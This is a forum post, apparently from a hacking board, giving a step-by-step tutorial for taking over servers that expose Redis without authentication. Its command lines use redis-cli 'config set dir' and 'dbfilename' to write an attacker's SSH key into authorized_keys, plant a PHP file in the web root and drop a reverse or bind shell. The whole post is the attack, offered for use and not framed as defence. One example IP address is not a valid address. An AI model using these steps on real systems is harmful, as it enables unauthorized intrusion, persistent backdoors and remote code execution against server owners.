Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


From Redis to complete system compromise - a step by step tutorial filter_list
Author
Message
From Redis to complete system compromise - a step by step tutorial #1
Today i just want to share a Tip about how you can compromise system if you find a redis instance on a server.

First of all just check if you can make a connection to it with redis-cli :
$ redis-cli -h <ip> -p <port>
If you are lucky and it get's connected you will get a shell like :
123.468.932.220:6379>
here you can type redis commands like set "something xyz" or "get something" but what it has to do with compromise?
Well you can use redis-cli to backdoor the server in many ways like gaining ssh on it, dropping a webshell (if it has web server running), drop a reverse or bind shell, Let's see how you can do that :
Adding SSH keys to the server and connect to it
First generate a ssh public/private key pair on your system (or any other system you are wiling to get ssh on)
$ssh-keygen -t rsa
then copy the public key to a text file and write it to the redis instance, for example :
$cat rekt.txt | redis-cli -h 10.68.58.02 -p 6379 -x set rekt
Then you need to save this public key to the authorized_keys file on redis server
>config set dir /home/$user/.ssh/
here $user can be whatever enumerated user you know. use enum4linux for that. so after that
>config set dbfilename "authorized_keys"
then type "save" and enter if everything goes well. you can connect to the server via ssh with your private key.
$ssh -i id_rsa username@ipaddress

With similar way you can drop a webshell for that you have to know the web-root directory on the server
connect to the redis server and follow these
>config set dir /var/www/html
>config set dbfilename redis.php
>set test "<?php phpinfo(); ?>"
>save
And similarly you can drop a reverse or bind shell just use
echo -e "reverseshell/bindshell one-liner here" | redis-cli -h <ip> -p <port> -x set 1
and then connect to the redis server set dir again with config set dir command then set file name with config set dbfilename and save it at the end then you can connect to your bind or reverse shell.

Reply